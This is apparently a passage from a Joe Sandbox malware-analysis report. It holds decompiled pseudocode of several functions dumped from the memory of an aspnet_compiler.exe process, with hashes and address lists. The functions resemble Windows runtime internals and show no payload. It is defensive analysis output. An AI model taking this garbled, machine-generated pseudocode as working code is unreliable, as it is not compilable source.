                          0x014bff0c
                          0x014bff14
                          0x014bff14

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                          • Instruction ID: 0f9e1d65b7a9d852c3f4ef1e082add63ccec281fae6a3d8761a6cb9cd602f165
                          • Opcode Fuzzy Hash: 3ef4319804cf21a17d71333ba11752c881d61f5af92be3a911c0d40f229f6d46
                          • Instruction Fuzzy Hash: E53128322006406FD3228B7DCCD4FBB7BA9EB95A50F18445BE94A8B762DA70DC06C770
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 70%
                          			E014BEA55(intOrPtr* __ecx, char __edx, signed int _a4) {
                          				signed int _v8;
                          				char _v12;
                          				intOrPtr _v15;
                          				char _v16;
                          				intOrPtr _v19;
                          				void* _v28;
                          				intOrPtr _v36;
                          				void* __ebx;
                          				void* __edi;
                          				signed char _t26;
                          				signed int _t27;
                          				char* _t40;
                          				unsigned int* _t50;
                          				intOrPtr* _t58;
                          				unsigned int _t59;
                          				char _t75;
                          				signed int _t86;
                          				intOrPtr _t88;
                          				intOrPtr* _t91;
                          
                          				_t75 = __edx;
                          				_t91 = __ecx;
                          				_v12 = __edx;
                          				_t50 = __ecx + 0x30;
                          				_t86 = _a4 & 0x00000001;
                          				if(_t86 == 0) {
                          					E01412280(_t26, _t50);
                          					_t75 = _v16;
                          				}
                          				_t58 = _t91;
                          				_t27 = E014BE815(_t58, _t75);
                          				_v8 = _t27;
                          				if(_t27 != 0) {
                          					E013FF900(_t91 + 0x34, _t27);
                          					if(_t86 == 0) {
                          						E0140FFB0(_t50, _t86, _t50);
                          					}
                          					_push( *((intOrPtr*)(_t91 + 4)));
                          					_push( *_t91);
                          					_t59 =  *(_v8 + 0x10);
                          					_t53 = 1 << (_t59 >> 0x00000002 & 0x0000003f);
                          					_push(0x8000);
                          					_t11 = _t53 - 1; // 0x0
                          					_t12 = _t53 - 1; // 0x0
                          					_v16 = ((_t59 >> 0x00000001 & 1) + (_t59 >> 0xc) << 0xc) - 1 + (1 << (_t59 >> 0x00000002 & 0x0000003f)) - (_t11 + ((_t59 >> 0x00000001 & 1) + (_t59 >> 0x0000000c) << 0x0000000c) & _t12);
                          					E014BAFDE( &_v12,  &_v16);
                          					asm("lock xadd [eax], ecx");
                          					asm("lock xadd [eax], ecx");
                          					E014BBCD2(_v8,  *_t91,  *((intOrPtr*)(_t91 + 4)));
                          					_t55 = _v36;
                          					_t88 = _v36;
                          					if(E01417D50() == 0) {
                          						_t40 = 0x7ffe0388;
                          					} else {
                          						_t55 = _v19;
                          						_t40 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                          					}
                          					if( *_t40 != 0) {
                          						E014AFE3F(_t55, _t91, _v15, _t55);
                          					}
                          				} else {
                          					if(_t86 == 0) {
                          						E0140FFB0(_t50, _t86, _t50);
                          						_t75 = _v16;
                          					}
                          					_push(_t58);
                          					_t88 = 0;
                          					_push(0);
                          					E014BA80D(_t91, 8, _t75, 0);
                          				}
                          				return _t88;
                          			}






















                          0x014bea55
                          0x014bea66
                          0x014bea68
                          0x014bea6c
                          0x014bea6f
                          0x014bea72
                          0x014bea75
                          0x014bea7a
                          0x014bea7a
                          0x014bea7e
                          0x014bea80
                          0x014bea85
                          0x014bea8b
                          0x014beab5
                          0x014beabc
                          0x014beabf
                          0x014beabf
                          0x014beaca
                          0x014beace
                          0x014bead0
                          0x014beae4
                          0x014beaeb
                          0x014beaf0
                          0x014beaf5
                          0x014beb09
                          0x014beb0d
                          0x014beb1d
                          0x014beb2d
                          0x014beb38
                          0x014beb3d
                          0x014beb41
                          0x014beb4a
                          0x014beb60
                          0x014beb4c
                          0x014beb52
                          0x014beb59
                          0x014beb59
                          0x014beb68
                          0x014beb71
                          0x014beb71
                          0x014bea8d
                          0x014bea8f
                          0x014bea92
                          0x014bea97
                          0x014bea97
                          0x014bea9b
                          0x014bea9c
                          0x014bea9e
                          0x014beaa6
                          0x014beaa6
                          0x014beb7e

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                          • Instruction ID: bc8b60b05d0da815946728f0e15c338bdfed37c78b2931b2a22351b1b7d7ef35
                          • Opcode Fuzzy Hash: f5f831e91637f778ab1786019c0fe1c1c634a5059deceac50859eb6d9a86e6aa
                          • Instruction Fuzzy Hash: 6A31B4726047069BC729DF29C8C0A9BB7AAFBD4210F04492EF55697795DE30E809C7B1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 69%
                          			E014769A6(signed short* __ecx, void* __eflags) {
                          				signed int _v8;
                          				signed int _v16;
                          				intOrPtr _v20;
                          				signed int _v24;
                          				signed short _v28;
                          				signed int _v32;
                          				intOrPtr _v36;
                          				signed int _v40;
                          				char* _v44;
                          				signed int _v48;
                          				intOrPtr _v52;
                          				signed int _v56;
                          				char _v60;
                          				signed int _v64;
                          				char _v68;
                          				char _v72;
                          				signed short* _v76;
                          				signed int _v80;
                          				char _v84;
                          				void* __ebx;
                          				void* __edi;
                          				void* __esi;
                          				void* _t68;
                          				intOrPtr _t73;
                          				signed short* _t74;
                          				void* _t77;
                          				void* _t78;
                          				signed int _t79;
                          				signed int _t80;
                          
                          				_v8 =  *0x14ed360 ^ _t80;
                          				_t75 = 0x100;
                          				_v64 = _v64 & 0x00000000;
                          				_v76 = __ecx;
                          				_t79 = 0;
                          				_t68 = 0;
                          				_v72 = 1;
                          				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
                          				_t77 = 0;
                          				if(L01406C59(__ecx[2], 0x100, __eflags) != 0) {
                          					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
                          					if(_t79 != 0 && E01476BA3() != 0) {
                          						_push(0);
                          						_push(0);
                          						_push(0);
                          						_push(0x1f0003);
                          						_push( &_v64);
                          						if(E01439980() >= 0) {
                          							E01412280(_t56, 0x14e8778);
                          							_t77 = 1;
                          							_t68 = 1;
                          							if( *0x14e8774 == 0) {
                          								asm("cdq");
                          								 *(_t79 + 0xf70) = _v64;
                          								 *(_t79 + 0xf74) = 0x100;
                          								_t75 = 0;
                          								_t73 = 4;
                          								_v60 =  &_v68;
                          								_v52 = _t73;
                          								_v36 = _t73;
                          								_t74 = _v76;
                          								_v44 =  &_v72;
                          								 *0x14e8774 = 1;
                          								_v56 = 0;
                          								_v28 = _t74[2];
                          								_v48 = 0;
                          								_v20 = ( *_t74 & 0x0000ffff) + 2;
                          								_v40 = 0;
                          								_v32 = 0;
                          								_v24 = 0;
                          								_v16 = 0;
                          								if(E013FB6F0(0x13dc338, 0x13dc288, 3,  &_v60) == 0) {
                          									_v80 = _v80 | 0xffffffff;
                          									_push( &_v84);
                          									_push(0);
                          									_push(_v64);
                          									_v84 = 0xfa0a1f00;
                          									E01439520();
                          								}
                          							}
                          						}
                          					}
                          				}
                          				if(_v64 != 0) {
                          					_push(_v64);
                          					E014395D0();
                          					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
                          					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
                          				}
                          				if(_t77 != 0) {
                          					E0140FFB0(_t68, _t77, 0x14e8778);
                          				}
                          				_pop(_t78);
                          				return E0143B640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
                          			}
































                          0x014769b5
                          0x014769be
                          0x014769c3
                          0x014769c9
                          0x014769cc
                          0x014769d1
                          0x014769d3
                          0x014769de
                          0x014769e1
                          0x014769ea
                          0x014769f6
                          0x014769fe
                          0x01476a13
                          0x01476a14
                          0x01476a15
                          0x01476a16
                          0x01476a1e
                          0x01476a26
                          0x01476a31
                          0x01476a36
                          0x01476a37
                          0x01476a40
                          0x01476a49
                          0x01476a4a
                          0x01476a53
                          0x01476a59
                          0x01476a5d
                          0x01476a5e
                          0x01476a64
                          0x01476a67
                          0x01476a6a
                          0x01476a6d
                          0x01476a70
                          0x01476a77
                          0x01476a7d
                          0x01476a86
                          0x01476a89
                          0x01476a9c
                          0x01476a9f
                          0x01476aa2
                          0x01476aa5
                          0x01476aaf
                          0x01476ab1
                          0x01476ab8
                          0x01476ab9
                          0x01476abb
                          0x01476abe
                          0x01476ac5
                          0x01476ac5
                          0x01476aaf
                          0x01476a40
                          0x01476a26
                          0x014769fe
                          0x01476ace
                          0x01476ad0
                          0x01476ad3
                          0x01476ad8
                          0x01476adf
                          0x01476adf
                          0x01476ae8
                          0x01476aef
                          0x01476aef
                          0x01476af9
                          0x01476b06

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 904a8e6d18c44e36c8b8123c45d475a7c8df642a52875b8b2368d404948aa719
                          • Instruction ID: fd93413876124e8ad67729485fb99f1d53cee76dc9c03a0334a21b571df6ef0f
                          • Opcode Fuzzy Hash: 904a8e6d18c44e36c8b8123c45d475a7c8df642a52875b8b2368d404948aa719
                          • Instruction Fuzzy Hash: 9D41AFB1D006099FEB20DFAAD940BFEBBF5EF58314F14852EE914A7260DB709905CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 85%
                          			E013F5210(intOrPtr _a4, void* _a8) {
                          				void* __ecx;
                          				intOrPtr _t31;
                          				signed int _t32;
                          				signed int _t33;
                          				intOrPtr _t35;
                          				signed int _t52;
                          				void* _t54;
                          				void* _t56;
                          				unsigned int _t59;
                          				signed int _t60;
                          				void* _t61;
                          
                          				_t61 = E013F52A5(1);
                          				if(_t61 == 0) {
                          					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
                          					_t54 =  *((intOrPtr*)(_t31 + 0x28));
                          					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
                          				} else {
                          					_t54 =  *((intOrPtr*)(_t61 + 0x10));
                          					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
                          				}
                          				_t60 = _t59 >> 1;
                          				_t32 = 0x3a;
                          				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
                          					_t52 = _t60 + _t60;
                          					if(_a4 > _t52) {
                          						goto L5;
                          					}
                          					if(_t61 != 0) {
                          						asm("lock xadd [esi], eax");
                          						if((_t32 | 0xffffffff) == 0) {
                          							_push( *((intOrPtr*)(_t61 + 4)));
                          							E014395D0();
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                          						}
                          					} else {
                          						E0140EB70(_t54, 0x14e79a0);
                          					}
                          					_t26 = _t52 + 2; // 0xddeeddf0
                          					return _t26;
                          				} else {
                          					_t52 = _t60 + _t60;
                          					if(_a4 < _t52) {
                          						if(_t61 != 0) {
                          							asm("lock xadd [esi], eax");
                          							if((_t32 | 0xffffffff) == 0) {
                          								_push( *((intOrPtr*)(_t61 + 4)));
                          								E014395D0();
                          								L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                          							}
                          						} else {
                          							E0140EB70(_t54, 0x14e79a0);
                          						}
                          						return _t52;
                          					}
                          					L5:
                          					_t33 = E0143F3E0(_a8, _t54, _t52);
                          					if(_t61 == 0) {
                          						E0140EB70(_t54, 0x14e79a0);
                          					} else {
                          						asm("lock xadd [esi], eax");
                          						if((_t33 | 0xffffffff) == 0) {
                          							_push( *((intOrPtr*)(_t61 + 4)));
                          							E014395D0();
                          							L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
                          						}
                          					}
                          					_t35 = _a8;
                          					if(_t60 <= 1) {
                          						L9:
                          						_t60 = _t60 - 1;
                          						 *((short*)(_t52 + _t35 - 2)) = 0;
                          						goto L10;
                          					} else {
                          						_t56 = 0x3a;
                          						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
                          							 *((short*)(_t52 + _t35)) = 0;
                          							L10:
                          							return _t60 + _t60;
                          						}
                          						goto L9;
                          					}
                          				}
                          			}














                          0x013f5220
                          0x013f5224
                          0x01450d13
                          0x01450d16
                          0x01450d19
                          0x013f522a
                          0x013f522a
                          0x013f522d
                          0x013f522d
                          0x013f5231
                          0x013f5235
                          0x013f5239
                          0x01450d5c
                          0x01450d62
                          0x00000000
                          0x00000000
                          0x01450d6a
                          0x01450d7b
                          0x01450d7f
                          0x01450d81
                          0x01450d84
                          0x01450d95
                          0x01450d95
                          0x01450d6c
                          0x01450d71
                          0x01450d71
                          0x01450d9a
                          0x00000000
                          0x013f524a
                          0x013f524a
                          0x013f5250
                          0x01450d24
                          0x01450d35
                          0x01450d39
                          0x01450d3b
                          0x01450d3e
                          0x01450d50
                          0x01450d50
                          0x01450d26
                          0x01450d2b
                          0x01450d2b
                          0x00000000
                          0x01450d55
                          0x013f5256
                          0x013f525b
                          0x013f5265
                          0x01450da7
                          0x013f526b
                          0x013f526e
                          0x013f5272
                          0x01450db1
                          0x01450db4
                          0x01450dc5
                          0x01450dc5
                          0x013f5272
                          0x013f5278
                          0x013f527e
                          0x013f528a
                          0x013f528c
                          0x013f528d
                          0x00000000
                          0x013f5280
                          0x013f5282
                          0x013f5288
                          0x013f529f
                          0x013f5292
                          0x00000000
                          0x013f5292
                          0x00000000
                          0x013f5288
                          0x013f527e

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 224b9b1eee732597972d20a42388ed2e30d73d228b83a5678f4924c3ab60e8f4
                          • Instruction ID: 16a43d98edde6b2b373593d9bbf3ad61567f191c46412532f7db88fc98b1fd91
                          • Opcode Fuzzy Hash: 224b9b1eee732597972d20a42388ed2e30d73d228b83a5678f4924c3ab60e8f4
                          • Instruction Fuzzy Hash: 37312436241A01EBC762AB19C880F6A7BA5FF60765F114B2FF9550B6F1DB70F805C690
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			E01433D43(signed short* __ecx, signed short* __edx, signed short* _a4, signed short** _a8, intOrPtr* _a12, intOrPtr* _a16) {
                          				intOrPtr _v8;
                          				char _v12;
                          				signed short** _t33;
                          				short* _t38;
                          				intOrPtr* _t39;
                          				intOrPtr* _t41;
                          				signed short _t43;
                          				intOrPtr* _t47;
                          				intOrPtr* _t53;
                          				signed short _t57;
                          				intOrPtr _t58;
                          				signed short _t60;
                          				signed short* _t61;
                          
                          				_t47 = __ecx;
                          				_t61 = __edx;
                          				_t60 = ( *__ecx & 0x0000ffff) + 2;
                          				if(_t60 > 0xfffe) {
                          					L22:
                          					return 0xc0000106;
                          				}
                          				if(__edx != 0) {
                          					if(_t60 <= ( *(__edx + 2) & 0x0000ffff)) {
                          						L5:
                          						E01407B60(0, _t61, 0x13d11c4);
                          						_v12 =  *_t47;
                          						_v12 = _v12 + 0xfff8;
                          						_v8 =  *((intOrPtr*)(_t47 + 4)) + 8;
                          						E01407B60(0xfff8, _t61,  &_v12);
                          						_t33 = _a8;
                          						if(_t33 != 0) {
                          							 *_t33 = _t61;
                          						}
                          						 *((short*)(_t61[2] + (( *_t61 & 0x0000ffff) >> 1) * 2)) = 0;
                          						_t53 = _a12;
                          						if(_t53 != 0) {
                          							_t57 = _t61[2];
                          							_t38 = _t57 + ((( *_t61 & 0x0000ffff) >> 1) - 1) * 2;
                          							while(_t38 >= _t57) {
                          								if( *_t38 == 0x5c) {
                          									_t41 = _t38 + 2;
                          									if(_t41 == 0) {
                          										break;
                          									}
                          									_t58 = 0;
                          									if( *_t41 == 0) {
                          										L19:
                          										 *_t53 = _t58;
                          										goto L7;
                          									}
                          									 *_t53 = _t41;
                          									goto L7;
                          								}
                          								_t38 = _t38 - 2;
                          							}
                          							_t58 = 0;
                          							goto L19;
                          						} else {
                          							L7:
                          							_t39 = _a16;
                          							if(_t39 != 0) {
                          								 *_t39 = 0;
                          								 *((intOrPtr*)(_t39 + 4)) = 0;
                          								 *((intOrPtr*)(_t39 + 8)) = 0;
                          								 *((intOrPtr*)(_t39 + 0xc)) = 0;
                          							}
                          							return 0;
                          						}
                          					}
                          					_t61 = _a4;
                          					if(_t61 != 0) {
                          						L3:
                          						_t43 = L01414620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t60);
                          						_t61[2] = _t43;
                          						if(_t43 == 0) {
                          							return 0xc0000017;
                          						}
                          						_t61[1] = _t60;
                          						 *_t61 = 0;
                          						goto L5;
                          					}
                          					goto L22;
                          				}
                          				_t61 = _a4;
                          				if(_t61 == 0) {
                          					return 0xc000000d;
                          				}
                          				goto L3;
                          			}
















                          0x01433d4c
                          0x01433d50
                          0x01433d55
                          0x01433d5e
                          0x0146e79a
                          0x00000000
                          0x0146e79a
                          0x01433d68
                          0x0146e789
                          0x01433d9d
                          0x01433da3
                          0x01433daf
                          0x01433db5
                          0x01433dbc
                          0x01433dc4
                          0x01433dc9
                          0x01433dce
                          0x0146e7ae
                          0x0146e7ae
                          0x01433dde
                          0x01433de2
                          0x01433de7
                          0x01433e0d
                          0x01433e13
                          0x01433e16
                          0x01433e1e
                          0x01433e25
                          0x01433e28
                          0x00000000
                          0x00000000
                          0x01433e2a
                          0x01433e2f
                          0x01433e37
                          0x01433e37
                          0x00000000
                          0x01433e37
                          0x01433e31
                          0x00000000
                          0x01433e31
                          0x01433e20
                          0x01433e20
                          0x01433e35
                          0x00000000
                          0x01433de9
                          0x01433de9
                          0x01433de9
                          0x01433dee
                          0x01433dfd
                          0x01433dff
                          0x01433e02
                          0x01433e05
                          0x01433e05
                          0x00000000
                          0x01433df0
                          0x01433de7
                          0x0146e78f
                          0x0146e794
                          0x01433d79
                          0x01433d84
                          0x01433d89
                          0x01433d8e
                          0x00000000
                          0x0146e7a4
                          0x01433d96
                          0x01433d9a
                          0x00000000
                          0x01433d9a
                          0x00000000
                          0x0146e794
                          0x01433d6e
                          0x01433d73
                          0x00000000
                          0x0146e7b5
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d291a1cfe06de33bf6925d8615fdf06b198af4d15ad0ee321aa595be5f926484
                          • Instruction ID: ae7586146a7137064511215b897b704aefbc9c47c5080d7535af612605595867
                          • Opcode Fuzzy Hash: d291a1cfe06de33bf6925d8615fdf06b198af4d15ad0ee321aa595be5f926484
                          • Instruction Fuzzy Hash: A831DC35A006119BC725CF2EC846A6BBBE5FF88710B05806FE94ACB370E634D842C7A1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 78%
                          			E0142A61C(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                          				intOrPtr _t35;
                          				intOrPtr _t39;
                          				intOrPtr _t45;
                          				intOrPtr* _t51;
                          				intOrPtr* _t52;
                          				intOrPtr* _t55;
                          				signed int _t57;
                          				intOrPtr* _t59;
                          				intOrPtr _t68;
                          				intOrPtr* _t77;
                          				void* _t79;
                          				signed int _t80;
                          				intOrPtr _t81;
                          				char* _t82;
                          				void* _t83;
                          
                          				_push(0x24);
                          				_push(0x14d0220);
                          				E0144D08C(__ebx, __edi, __esi);
                          				 *((intOrPtr*)(_t83 - 0x30)) = __edx;
                          				_t79 = __ecx;
                          				_t35 =  *0x14e7b9c; // 0x0
                          				_t55 = L01414620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t35 + 0xc0000, 0x28);
                          				 *((intOrPtr*)(_t83 - 0x24)) = _t55;
                          				if(_t55 == 0) {
                          					_t39 = 0xc0000017;
                          					L11:
                          					return E0144D0D1(_t39);
                          				}
                          				_t68 = 0;
                          				 *((intOrPtr*)(_t83 - 0x1c)) = 0;
                          				 *(_t83 - 4) =  *(_t83 - 4) & 0;
                          				_t7 = _t55 + 8; // 0x8
                          				_t57 = 6;
                          				memcpy(_t7, _t79, _t57 << 2);
                          				_t80 = 0xfffffffe;
                          				 *(_t83 - 4) = _t80;
                          				if(0 < 0) {
                          					L14:
                          					_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                          					L20:
                          					L014177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t55);
                          					_t39 = _t81;
                          					goto L11;
                          				}
                          				if( *((intOrPtr*)(_t55 + 0xc)) <  *(_t55 + 8)) {
                          					_t81 = 0xc000007b;
                          					goto L20;
                          				}
                          				if( *((intOrPtr*)(_t83 + 0xc)) == 0) {
                          					_t59 =  *((intOrPtr*)(_t83 + 8));
                          					_t45 =  *_t59;
                          					 *((intOrPtr*)(_t83 - 0x20)) = _t45;
                          					 *_t59 = _t45 + 1;
                          					L6:
                          					 *(_t83 - 4) = 1;
                          					 *((intOrPtr*)( *((intOrPtr*)(_t55 + 0x10)))) =  *((intOrPtr*)(_t83 - 0x20));
                          					 *(_t83 - 4) = _t80;
                          					if(_t68 < 0) {
                          						_t82 =  *((intOrPtr*)(_t83 + 0xc));
                          						if(_t82 == 0) {
                          							goto L14;
                          						}
                          						asm("btr eax, ecx");
                          						_t81 =  *((intOrPtr*)(_t83 - 0x1c));
                          						if( *_t82 != 0) {
                          							 *0x14e7b10 =  *0x14e7b10 - 8;
                          						}
                          						goto L20;
                          					}
                          					 *((intOrPtr*)(_t55 + 0x24)) =  *((intOrPtr*)(_t83 - 0x20));
                          					 *((intOrPtr*)(_t55 + 0x20)) =  *((intOrPtr*)(_t83 - 0x30));
                          					_t51 =  *0x14e536c; // 0x776f5368
                          					if( *_t51 != 0x14e5368) {
                          						_push(3);
                          						asm("int 0x29");
                          						goto L14;
                          					}
                          					 *_t55 = 0x14e5368;
                          					 *((intOrPtr*)(_t55 + 4)) = _t51;
                          					 *_t51 = _t55;
                          					 *0x14e536c = _t55;
                          					_t52 =  *((intOrPtr*)(_t83 + 0x10));
                          					if(_t52 != 0) {
                          						 *_t52 = _t55;
                          					}
                          					_t39 = 0;
                          					goto L11;
                          				}
                          				_t77 =  *((intOrPtr*)(_t83 + 8));
                          				_t68 = E0142A70E(_t77,  *((intOrPtr*)(_t83 + 0xc)));
                          				 *((intOrPtr*)(_t83 - 0x1c)) = _t68;
                          				if(_t68 < 0) {
                          					goto L14;
                          				}
                          				 *((intOrPtr*)(_t83 - 0x20)) =  *_t77;
                          				goto L6;
                          			}


















                          0x0142a61c
                          0x0142a61e
                          0x0142a623
                          0x0142a628
                          0x0142a62b
                          0x0142a62d
                          0x0142a648
                          0x0142a64a
                          0x0142a64f
                          0x01469b44
                          0x0142a6ec
                          0x0142a6f1
                          0x0142a6f1
                          0x0142a655
                          0x0142a657
                          0x0142a65a
                          0x0142a65d
                          0x0142a662
                          0x0142a663
                          0x0142a667
                          0x0142a668
                          0x0142a66d
                          0x0142a706
                          0x0142a706
                          0x01469bda
                          0x01469be6
                          0x01469beb
                          0x00000000
                          0x01469beb
                          0x0142a679
                          0x01469b7a
                          0x00000000
                          0x01469b7a
                          0x0142a683
                          0x0142a6f4
                          0x0142a6f7
                          0x0142a6f9
                          0x0142a6fd
                          0x0142a6a0
                          0x0142a6a0
                          0x0142a6ad
                          0x0142a6af
                          0x0142a6b4
                          0x01469ba7
                          0x01469bac
                          0x00000000
                          0x00000000
                          0x01469bc6
                          0x01469bce
                          0x01469bd1
                          0x01469bd3
                          0x01469bd3
                          0x00000000
                          0x01469bd1
                          0x0142a6bd
                          0x0142a6c3
                          0x0142a6c6
                          0x0142a6d2
                          0x0142a701
                          0x0142a704
                          0x00000000
                          0x0142a704
                          0x0142a6d4
                          0x0142a6d6
                          0x0142a6d9
                          0x0142a6db
                          0x0142a6e1
                          0x0142a6e6
                          0x0142a6e8
                          0x0142a6e8
                          0x0142a6ea
                          0x00000000
                          0x0142a6ea
                          0x0142a688
                          0x0142a692
                          0x0142a694
                          0x0142a699
                          0x00000000
                          0x00000000
                          0x0142a69d
                          0x00000000

                          Memory Dump Source
                          • Source File: 00000007.00000002.356845668.00000000013D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013D0000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_7_2_13d0000_aspnet_compiler.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 3c4b7ab04253ee2453c3faf0d19a92a655d3955a38f7502406b1402df243bc3a
                          • Instruction ID: d58fbb875edd046bacf2f6f4da2eae2f47ec08d9303872bcb14a62435378389d
                          • Opcode Fuzzy Hash: 3c4b7ab04253ee2453c3faf0d19a92a655d3955a38f7502406b1402df243bc3a
                          • Instruction Fuzzy Hash: ED419CB5A00215DFCB15CF58C480B99BBF1FB98718F28806AE909AF765C3B4E941CF94
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 68%
                          			E0141C182(void* __ecx, unsigned int* __edx, intOrPtr _a4) {
                          				signed int* _v8;
                          				char _v16;
                          				void* __ebx;
                          				void* __edi;
                          				signed char _t33;
                          				signed char _t43;
                          				signed char _t48;
                          				signed char _t62;
                          				void* _t63;
                          				intOrPtr _t69;
                          				intOrPtr _t71;
                          				unsigned int* _t82;
                          				void* _t83;
                          
                          				_t80 = __ecx;
                          				_t82 = __edx;
                          				_t33 =  *((intOrPtr*)(__ecx + 0xde));
                          				_t62 = _t33 >> 0x00000001 & 0x00000001;
                          				if((_t33 & 0x00000001) != 0) {
                          					_v8 = ((0 | _t62 != 0x00000000) - 0x00000001 & 0x00000048) + 8 + __edx;
                          					if(E01417D50() != 0) {
                          						_t43 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                          					} else {
                          						_t43 = 0x7ffe0386;
                          					}
                          					if( *_t43 != 0) {
                          						_t43 = E014C8D34(_v8, _t80);
                          					}
                          					E01412280(_t43, _t82);
                          					if( *((char*)(_t80 + 0xdc)) == 0) {
                          						E0140FFB0(_t62, _t80, _t82);
                          						 *(_t80 + 0xde) =  *(_t80 + 0xde) | 0x00000004;
                          						_t30 = _t80 + 0xd0; // 0xd0
                          						_t83 = _t30;
                          						E014C8833(_t83,  &_v16);
                          						_t81 = _t80 + 0x90;
                          						E0140FFB0(_t62, _t80 + 0x90, _t80 + 0x90);
                          						_t63 = 0;
                          						_push(0);
                          						_push(_t83);
                          						_t48 = E0143B180();
                          						if(_a4 != 0) {
                          							E01412280(_t48, _t81);
                          						}
                          					} else {
                          						_t69 = _v8;
                          						_t12 = _t80 + 0x98; // 0x98
                          						_t13 = _t69 + 0xc; // 0x575651ff
                          						E0141BB2D(_t13, _t12);
                          						_t71 = _v8;
                          						_t15 = _t80 + 0xb0; // 0xb0
                          						_t16 = _t71 + 8; // 0x8b000cc2
                          						E0141BB2D(_t16, _t15);
                          						E0141B944(_v8, _t62);
                          						 *((char*)(_t80 + 0xdc)) = 0;
                          						E0140FFB0(0, _t80, _t82);
                          						 *((intOrPtr*)(_t80 + 0xd8)) = 0;
                          						 *((intOrPtr*)(_t80 + 0xc8)) = 0;
                          						 *((intOrPtr*)(_t80 + 0xcc)) = 0;
                          						 *(_t80 + 0xde) = 0;
                          						if(_a4 == 0) {
                          							_t25 = _t80 + 0x90; // 0x90
                          							E0140FFB0(0, _t80, _t25);
                          						}
                          						_t63 = 1;
                          					}
                          					return _t63;
                          				}
                          				 *((intOrPtr*)(__ecx + 0xc8)) = 0;
                          				 *((intOrPtr*)(__ecx + 0xcc)) = 0;
                          				if(_a4 == 0) {
                          					_t24 = _t80 + 0x90; // 0x90
                          					E0140FFB0(0, __ecx, _t24);
                          				}
                          				return 0;
                          			}
















                          0x0141c18d
                          0x0141c18f
                          0x0141c191
                          0x0141c19b
                          0x0141c1a0
                          0x0141c1d4
                          0x0141c1de
                          0x01462d6e
                          0x0141c1e4
                          0x0141c1e4
                          0x0141c1e4
                          0x0141c1ec
                          0x01462d7d
                          0x01462d7d
                          0x0141c1f3
                          0x0141c1ff
                          0x01462d88
                          0x01462d8d
                          0x01462d94
                          0x01462d94
                          0x01462d9f
                          0x01462da4
                          0x01462dab
                          0x01462db0
                          0x01462db2
                          0x01462db3
                          0x01462db4
                          0x01462dbc
                          0x01462dc3
                          0x01462dc3
                          0x0141c205
                          0x0141c205
                          0x0141c208
                          0x0141c20e
                          0x0141c211
                          0x0141c216
                          0x0141c219
                          0x0141c21f
                          0x0141c222
                          0x0141c22c
                          0x0141c234
                          0x0141c23a
                          0x0141c23f
                          0x0141c245
                          0x0141c24b
                          0x0141c251
                          0x0141c25a
                          0x0141c276
                          0x0141c27d
                          0x0141c27d
                          0x0141c25c
                          0x0141c25c
                          0x00000000
                          0x0141c25e
